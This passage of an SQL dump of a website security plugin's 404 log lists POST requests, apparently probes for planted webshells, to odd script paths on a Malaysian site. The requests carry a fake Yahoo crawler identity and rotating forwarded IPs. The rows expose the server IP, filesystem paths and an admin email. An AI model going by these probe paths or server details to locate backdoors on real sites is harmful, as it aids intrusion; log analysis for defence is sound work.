http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.58.75.141\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.58.75.141\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/feg/pabi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/feg/pabi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgZLP2yel5jEccgdeWIgAAAYk\";s:12:\"REDIRECT_URL\";s:13:\"/feg/pabi.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64014\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/feg/pabi.asp\";s:10:\"SCRIPT_URL\";s:13:\"/feg/pabi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgZLP2yel5jEccgdeWIgAAAYk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512420.5823\";s:12:\"REQUEST_TIME\";s:10:\"1571512420\";}}','notice','2019-10-19 19:13:42','2019-10-19 19:13:40',35345504,37148288,'http://bintara.com.my//feg/pabi.asp',1,0,'218.58.75.141'),(28456,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//feg/pabi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"222.88.47.15\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"222.88.47.15\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/feg/pabi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/feg/pabi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgbLVvTBqXFHRB7z80KQAAABg\";s:12:\"REDIRECT_URL\";s:13:\"/feg/pabi.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64222\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/feg/pabi.asp\";s:10:\"SCRIPT_URL\";s:13:\"/feg/pabi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgbLVvTBqXFHRB7z80KQAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512428.4321\";s:12:\"REQUEST_TIME\";s:10:\"1571512428\";}}','notice','2019-10-19 19:13:51','2019-10-19 19:13:48',35659184,37462096,'http://bintara.com.my//feg/pabi.asp',1,0,'222.88.47.15'),(28457,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//jhty/ye.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.83.232.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.83.232.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatgc-VzlVwlNsD8qm@4CgAAANQ\";s:12:\"REDIRECT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62444\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:10:\"SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatgc-VzlVwlNsD8qm@4CgAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512435.7178\";s:12:\"REQUEST_TIME\";s:10:\"1571512435\";}}','notice','2019-10-19 19:13:57','2019-10-19 19:13:56',35264232,37064720,'http://bintara.com.my//jhty/ye.AsPX',1,0,'222.83.232.14'),(28458,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//jhty/ye.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.98.238.13\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.98.238.13\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatgh-VzlVwlNsD8qm@4DgAAANg\";s:12:\"REDIRECT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:10:\"SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatgh-VzlVwlNsD8qm@4DgAAANg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512456.1082\";s:12:\"REQUEST_TIME\";s:10:\"1571512456\";}}','notice','2019-10-19 19:14:18','2019-10-19 19:14:16',35267512,37072936,'http://bintara.com.my//jhty/ye.AsPX',1,0,'211.98.238.13'),(28459,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//jhty/ye.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.89.153.164\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.89.153.164\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatgl7P2yel5jEccgdeWSQAAAZU\";s:12:\"REDIRECT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63517\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:10:\"SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatgl7P2yel5jEccgdeWSQAAAZU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512471.2427\";s:12:\"REQUEST_TIME\";s:10:\"1571512471\";}}','notice','2019-10-19 19:14:33','2019-10-19 19:14:31',35345600,37155496,'http://bintara.com.my//jhty/ye.AsPX',1,0,'211.89.153.164'),(28460,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//jhty/ye.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.189.92.105\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.189.92.105\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgqrP2yel5jEccgdeWXQAAAZg\";s:12:\"REDIRECT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64102\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/jhty/ye.AsPX\";s:10:\"SCRIPT_URL\";s:13:\"/jhty/ye.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgqrP2yel5jEccgdeWXQAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512490.6874\";s:12:\"REQUEST_TIME\";s:10:\"1571512490\";}}','notice','2019-10-19 19:14:52','2019-10-19 19:14:51',35266352,37068912,'http://bintara.com.my//jhty/ye.AsPX',1,0,'220.189.92.105'),(28461,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//guest/ji.pHP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"219.149.101.8\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"219.149.101.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/guest/ji.pHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/guest/ji.pHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatgvbVvTBqXFHRB7z80OgAAAAQ\";s:12:\"REDIRECT_URL\";s:13:\"/guest/ji.pHP\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62957\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/guest/ji.pHP\";s:10:\"SCRIPT_URL\";s:13:\"/guest/ji.pHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatgvbVvTBqXFHRB7z80OgAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571512509.288\";s:12:\"REQUEST_TIME\";s:10:\"1571512509\";}}','notice','2019-10-19 19:15:11','2019-10-19 19:15:09',35263704,37068248,'http://bintara.com.my//guest/ji.pHP',1,0,'219.149.101.8'),(28462,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//guest/ji.pHP\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.150.156.49\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.150.156.49\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/guest/ji.pHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/guest/ji.pHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatg1Yq@uz@DI827WH6wmgAAAUg\";s:12:\"REDIRECT_URL\";s:13:\"/guest/ji.pHP\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63647\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/guest/ji.pHP\";s:10:\"SCRIPT_URL\";s:13:\"/guest/ji.pHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatg1Yq@uz@DI827WH6wmgAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512533.3704\";s:12:\"REQUEST_TIME\";s:10:\"1571512533\";}}','notice','2019-10-19 19:15:36','2019-10-19 19:15:33',35268472,37077864,'http://bintara.com.my//guest/ji.pHP',1,0,'61.150.156.49'),(28463,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//cache/qwea.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.194.25.205\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.194.25.205\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatg@47-RFqMeLUZjgue7QAAAJc\";s:12:\"REDIRECT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63822\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatg@47-RFqMeLUZjgue7QAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571512571.14\";s:12:\"REQUEST_TIME\";s:10:\"1571512571\";}}','notice','2019-10-19 19:16:12','2019-10-19 19:16:11',35267232,37067688,'http://bintara.com.my//cache/qwea.ashx',1,0,'220.194.25.205'),(28464,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//cache/qwea.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 